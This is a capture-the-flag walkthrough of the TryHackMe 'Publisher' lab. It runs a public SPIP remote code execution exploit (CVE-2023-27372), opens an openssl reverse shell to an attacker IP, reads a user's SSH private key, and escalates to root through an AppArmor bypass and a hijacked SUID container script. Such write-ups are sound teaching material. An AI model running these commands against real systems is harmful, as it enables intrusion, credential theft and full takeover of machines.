TryHackMe Publisher WriteUp | Easy

TryHackMe Publisher WriteUp | Easy

Let's see what ports are open -

nmap -sVC -T4 10.10.210.141
Nmap scan report for 10.10.210.141
Host is up (0.20s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)
|   256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)
|_  256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Publisher's Pulse: SPIP Insights & Tips
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_  Supported Methods: OPTIONS HEAD GET POST
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

As per hint in description of the challenge, we will search for RCE Exploit for Spip

searchsploit spip
SPIP v4.2.0 - Remote Code Execution (Unauthenticated)                                                     | php/webapps/51536.py

We will use this github exploit to get the initial foothold - CVE-2023-27372

git clone https://github.com/0SPwn/CVE-2023-27372-PoC
cd CVE-2023-27372-PoC
pip install -r requirements.txt
python3 exploit.py -u "http://10.10.210.141/spip/spip.php?page=spip_pass&lang=fr"

Getting reverse shell on nc using openssl

on attacker -

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 1337

on victim -

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.8.47.242:1337 > /tmp/s; rm /tmp/s

stablize it -

script -qc /bin/bash /dev/null

OR

Copy id_rsa of think user

cat /home/think/.ssh/id_rsa

Privesc To Root -

Bypass App Armor using perl bypass - HackTricks App Armor

echo '#!/usr/bin/perl
use POSIX qw(strftime);
use POSIX qw(setuid);
POSIX::setuid(0);
exec "/bin/sh"' > /dev/shm/test.pl
chmod +x /dev/shm/test.pl
/dev/shm/test.pl

SUID /usr/sbin/run_container -

find / -perm /4000 2>/dev/null
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/xorg/Xorg.wrap
/usr/sbin/pppd
/usr/sbin/run_container <-----
/usr/bin/at
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/umount

Running /usr/sbin/run_container

think@publisher:~$ run_container
List of Docker containers:
ID: 41c976e507f8 | Name: jovial_hertz | Status: Up 17 minutes

Enter the ID of the container or leave blank to create a new one: 41c976e507f8
/opt/run_container.sh: line 16: validate_container_id: command not found  <---------

OPTIONS:
1) Start Container
2) Stop Container
3) Restart Container
4) Create Container
5) Quit
Choose an action for a container:

Editing /opt/run_container.sh to get root

cp /usr/bin/bash /tmp/rootbash
chmod +s /tmp/rootbash
/usr/sbin/run_container
41c976e507f8
3
/tmp/rootbash -p

bash-5.0# whoami
root